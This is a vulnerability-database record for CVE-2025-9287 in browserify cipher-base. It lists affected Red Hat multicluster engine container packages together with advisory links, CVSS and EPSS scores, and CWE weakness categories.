vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-cluster-proxy-addon@container-v2.7%3Farch=6-4

url pkg:rpm/redhat/multicluster-engine-console-mce@container-v2.7?arch=6-4

purl pkg:rpm/redhat/multicluster-engine-console-mce@container-v2.7?arch=6-4

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-console-mce@container-v2.7%3Farch=6-4

url pkg:rpm/redhat/multicluster-engine-discovery-operator@container-v2.7?arch=6-3

purl pkg:rpm/redhat/multicluster-engine-discovery-operator@container-v2.7?arch=6-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-discovery-operator@container-v2.7%3Farch=6-3

url pkg:rpm/redhat/multicluster-engine-hive@container-v2.7?arch=6-4

purl pkg:rpm/redhat/multicluster-engine-hive@container-v2.7?arch=6-4

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-hive@container-v2.7%3Farch=6-4

url pkg:rpm/redhat/multicluster-engine-hypershift-addon-operator@container-v2.7?arch=6-4

purl pkg:rpm/redhat/multicluster-engine-hypershift-addon-operator@container-v2.7?arch=6-4

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-hypershift-addon-operator@container-v2.7%3Farch=6-4

url pkg:rpm/redhat/multicluster-engine-hypershift-cli@container-v2.7?arch=6-4

purl pkg:rpm/redhat/multicluster-engine-hypershift-cli@container-v2.7?arch=6-4

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-hypershift-cli@container-v2.7%3Farch=6-4

url pkg:rpm/redhat/multicluster-engine-hypershift-operator@container-v2.7?arch=6-3

purl pkg:rpm/redhat/multicluster-engine-hypershift-operator@container-v2.7?arch=6-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-hypershift-operator@container-v2.7%3Farch=6-3

url pkg:rpm/redhat/multicluster-engine-image-based-install@container-v2.7?arch=6-11

purl pkg:rpm/redhat/multicluster-engine-image-based-install@container-v2.7?arch=6-11

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-image-based-install@container-v2.7%3Farch=6-11

url pkg:rpm/redhat/multicluster-engine-kube-rbac-proxy-mce@container-v2.7?arch=6-3

purl pkg:rpm/redhat/multicluster-engine-kube-rbac-proxy-mce@container-v2.7?arch=6-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-kube-rbac-proxy-mce@container-v2.7%3Farch=6-3

url pkg:rpm/redhat/multicluster-engine-managedcluster-import-controller@container-v2.7?arch=6-4

purl pkg:rpm/redhat/multicluster-engine-managedcluster-import-controller@container-v2.7?arch=6-4

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-managedcluster-import-controller@container-v2.7%3Farch=6-4

url pkg:rpm/redhat/multicluster-engine-managed-serviceaccount@container-v2.7?arch=6-4

purl pkg:rpm/redhat/multicluster-engine-managed-serviceaccount@container-v2.7?arch=6-4

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-managed-serviceaccount@container-v2.7%3Farch=6-4

url pkg:rpm/redhat/multicluster-engine-multicloud-manager@container-v2.7?arch=6-3

purl pkg:rpm/redhat/multicluster-engine-multicloud-manager@container-v2.7?arch=6-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-multicloud-manager@container-v2.7%3Farch=6-3

url pkg:rpm/redhat/multicluster-engine-must-gather@container-v2.7?arch=6-3

purl pkg:rpm/redhat/multicluster-engine-must-gather@container-v2.7?arch=6-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-must-gather@container-v2.7%3Farch=6-3

url pkg:rpm/redhat/multicluster-engine-operator@container-v2.7?arch=6-5

purl pkg:rpm/redhat/multicluster-engine-operator@container-v2.7?arch=6-5

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-operator@container-v2.7%3Farch=6-5

url pkg:rpm/redhat/multicluster-engine-operator-bundle@container-v2.7?arch=6-9

purl pkg:rpm/redhat/multicluster-engine-operator-bundle@container-v2.7?arch=6-9

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-operator-bundle@container-v2.7%3Farch=6-9

url pkg:rpm/redhat/multicluster-engine-placement@container-v2.7?arch=6-3

purl pkg:rpm/redhat/multicluster-engine-placement@container-v2.7?arch=6-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-placement@container-v2.7%3Farch=6-3

url pkg:rpm/redhat/multicluster-engine-provider-credential-controller@container-v2.7?arch=6-4

purl pkg:rpm/redhat/multicluster-engine-provider-credential-controller@container-v2.7?arch=6-4

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-provider-credential-controller@container-v2.7%3Farch=6-4

url pkg:rpm/redhat/multicluster-engine-registration@container-v2.7?arch=6-3

purl pkg:rpm/redhat/multicluster-engine-registration@container-v2.7?arch=6-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-registration@container-v2.7%3Farch=6-3

url pkg:rpm/redhat/multicluster-engine-registration-operator@container-v2.7?arch=6-3

purl pkg:rpm/redhat/multicluster-engine-registration-operator@container-v2.7?arch=6-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-registration-operator@container-v2.7%3Farch=6-3

url pkg:rpm/redhat/multicluster-engine-work@container-v2.7?arch=6-3

purl pkg:rpm/redhat/multicluster-engine-work@container-v2.7?arch=6-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-engine-work@container-v2.7%3Farch=6-3

url pkg:rpm/redhat/multiclusterhub-operator@container-v2.12?arch=5-5

purl pkg:rpm/redhat/multiclusterhub-operator@container-v2.12?arch=5-5

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multiclusterhub-operator@container-v2.12%3Farch=5-5

url pkg:rpm/redhat/multicluster-observability-operator@container-v2.12?arch=5-4

purl pkg:rpm/redhat/multicluster-observability-operator@container-v2.12?arch=5-4

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-observability-operator@container-v2.12%3Farch=5-4

url pkg:rpm/redhat/multicluster-operators-application@container-v2.12?arch=5-3

purl pkg:rpm/redhat/multicluster-operators-application@container-v2.12?arch=5-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-operators-application@container-v2.12%3Farch=5-3

url pkg:rpm/redhat/multicluster-operators-channel@container-v2.12?arch=5-4

purl pkg:rpm/redhat/multicluster-operators-channel@container-v2.12?arch=5-4

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-operators-channel@container-v2.12%3Farch=5-4

url pkg:rpm/redhat/multicluster-operators-subscription-operator@container-v2.12?arch=5-5

purl pkg:rpm/redhat/multicluster-operators-subscription-operator@container-v2.12?arch=5-5

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/multicluster-operators-subscription-operator@container-v2.12%3Farch=5-5

url pkg:rpm/redhat/node-exporter@container-v2.12?arch=5-3

purl pkg:rpm/redhat/node-exporter@container-v2.12?arch=5-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/node-exporter@container-v2.12%3Farch=5-3

url pkg:rpm/redhat/observatorium@container-v2.12?arch=5-3

purl pkg:rpm/redhat/observatorium@container-v2.12?arch=5-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/observatorium@container-v2.12%3Farch=5-3

url pkg:rpm/redhat/observatorium-operator@container-v2.12?arch=5-3

purl pkg:rpm/redhat/observatorium-operator@container-v2.12?arch=5-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/observatorium-operator@container-v2.12%3Farch=5-3

url pkg:rpm/redhat/prometheus@container-v2.12?arch=5-4

purl pkg:rpm/redhat/prometheus@container-v2.12?arch=5-4

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/prometheus@container-v2.12%3Farch=5-4

url pkg:rpm/redhat/prometheus-alertmanager@container-v2.12?arch=5-3

purl pkg:rpm/redhat/prometheus-alertmanager@container-v2.12?arch=5-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/prometheus-alertmanager@container-v2.12%3Farch=5-3

url pkg:rpm/redhat/rbac-query-proxy@container-v2.12?arch=5-4

purl pkg:rpm/redhat/rbac-query-proxy@container-v2.12?arch=5-4

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/rbac-query-proxy@container-v2.12%3Farch=5-4

url pkg:rpm/redhat/search-collector@container-v2.12?arch=5-5

purl pkg:rpm/redhat/search-collector@container-v2.12?arch=5-5

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/search-collector@container-v2.12%3Farch=5-5

url pkg:rpm/redhat/submariner-addon@container-v2.12?arch=5-4

purl pkg:rpm/redhat/submariner-addon@container-v2.12?arch=5-4

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/submariner-addon@container-v2.12%3Farch=5-4

url pkg:rpm/redhat/thanos@container-v2.12?arch=5-3

purl pkg:rpm/redhat/thanos@container-v2.12?arch=5-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/thanos@container-v2.12%3Farch=5-3

url pkg:rpm/redhat/thanos-receive-controller@container-v2.12?arch=5-3

purl pkg:rpm/redhat/thanos-receive-controller@container-v2.12?arch=5-3

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-4pq8-1dxx-37gj

vulnerability	VCID-eraj-dyxs-xkfd

vulnerability	VCID-fr74-wcxv-quam

vulnerability	VCID-tt31-4d54-k7cz

resource_url http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/thanos-receive-controller@container-v2.12%3Farch=5-3

References

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-9287.json

reference_id

reference_type

scores

value	7.5
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-9287.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2025-9287

reference_id

reference_type

scores

value	0.00106
scoring_system	epss
scoring_elements	0.28565
published_at	2026-04-21T12:55:00Z

value	0.00106
scoring_system	epss
scoring_elements	0.28615
published_at	2026-04-18T12:55:00Z

value	0.00106
scoring_system	epss
scoring_elements	0.2864
published_at	2026-04-16T12:55:00Z

value	0.00106
scoring_system	epss
scoring_elements	0.2862
published_at	2026-04-13T12:55:00Z

value	0.00106
scoring_system	epss
scoring_elements	0.28668
published_at	2026-04-12T12:55:00Z

value	0.00106
scoring_system	epss
scoring_elements	0.28798
published_at	2026-04-04T12:55:00Z

value	0.00106
scoring_system	epss
scoring_elements	0.28605
published_at	2026-04-07T12:55:00Z

value	0.00106
scoring_system	epss
scoring_elements	0.2875
published_at	2026-04-02T12:55:00Z

value	0.00106
scoring_system	epss
scoring_elements	0.28711
published_at	2026-04-09T12:55:00Z

value	0.00106
scoring_system	epss
scoring_elements	0.28713
published_at	2026-04-11T12:55:00Z

value	0.00106
scoring_system	epss
scoring_elements	0.2867
published_at	2026-04-08T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2025-9287

reference_url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-9287
reference_id
reference_type
scores
url	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-9287

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	9
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/browserify/cipher-base

reference_id

reference_type

scores

value	9.1
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

value	9.1
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N

value	CRITICAL
scoring_system	generic_textual
scoring_elements

url

https://github.com/browserify/cipher-base

reference_url

https://github.com/browserify/cipher-base/commit/8fd136432ca298a664f5637629cf2b42a6c7f294

reference_id

reference_type

scores

value	9.1
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

value	9.1
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N

value	CRITICAL
scoring_system	generic_textual
scoring_elements

url

https://github.com/browserify/cipher-base/commit/8fd136432ca298a664f5637629cf2b42a6c7f294

reference_url

https://github.com/browserify/cipher-base/pull/23

reference_id

reference_type

scores

value	9.1
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

value	9.1
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N

value	CRITICAL
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-21T13:25:49Z/

url

https://github.com/browserify/cipher-base/pull/23

reference_url

https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc

reference_id

reference_type

scores

value	9.1
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

value	CRITICAL
scoring_system	cvssv3.1_qr
scoring_elements

value	9.1
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N

value	CRITICAL
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-08-21T13:25:49Z/

url

https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc

reference_url

https://lists.debian.org/debian-lts-announce/2025/09/msg00005.html

reference_id

reference_type

scores

value	9.1
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

value	9.1
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N

value	CRITICAL
scoring_system	generic_textual
scoring_elements

url

https://lists.debian.org/debian-lts-announce/2025/09/msg00005.html

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2025-9287

reference_id

reference_type

scores

value	9.1
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

value	9.1
scoring_system	cvssv4
scoring_elements	CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:H/SI:H/SA:N

value	CRITICAL
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2025-9287

reference_url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1111772
reference_id	1111772
reference_type
scores
url	https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1111772

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2389932
reference_id	2389932
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2389932

reference_url

https://github.com/advisories/GHSA-cpq7-6gpm-g9rc

reference_id

GHSA-cpq7-6gpm-g9rc

reference_type

scores

value	CRITICAL
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-cpq7-6gpm-g9rc

reference_url	https://access.redhat.com/errata/RHSA-2025:14767
reference_id	RHSA-2025:14767
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:14767

reference_url	https://access.redhat.com/errata/RHSA-2025:15847
reference_id	RHSA-2025:15847
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:15847

reference_url	https://access.redhat.com/errata/RHSA-2025:16020
reference_id	RHSA-2025:16020
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:16020

reference_url	https://access.redhat.com/errata/RHSA-2025:18278
reference_id	RHSA-2025:18278
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:18278

reference_url	https://access.redhat.com/errata/RHSA-2025:18744
reference_id	RHSA-2025:18744
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:18744

reference_url	https://access.redhat.com/errata/RHSA-2025:22905
reference_id	RHSA-2025:22905
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2025:22905

reference_url	https://access.redhat.com/errata/RHSA-2026:3710
reference_id	RHSA-2026:3710
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:3710

reference_url	https://access.redhat.com/errata/RHSA-2026:3712
reference_id	RHSA-2026:3712
reference_type
scores
url	https://access.redhat.com/errata/RHSA-2026:3712

reference_url	https://usn.ubuntu.com/7746-1/
reference_id	USN-7746-1
reference_type
scores
url	https://usn.ubuntu.com/7746-1/

Weaknesses

cwe_id	20
name	Improper Input Validation
description	The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.

cwe_id	937
name	OWASP Top Ten 2013 Category A9 - Using Components with Known Vulnerabilities
description	Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2013.

cwe_id	1035
name	OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities
description	Weaknesses in this category are related to the A9 category in the OWASP Top Ten 2017.

Exploits

Severity_range_score 7.5 - 10.0

Exploitability 0.5

Weighted_severity 9.0

Risk_score 4.5

Resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-tt31-4d54-k7cz

Vulnerability Instance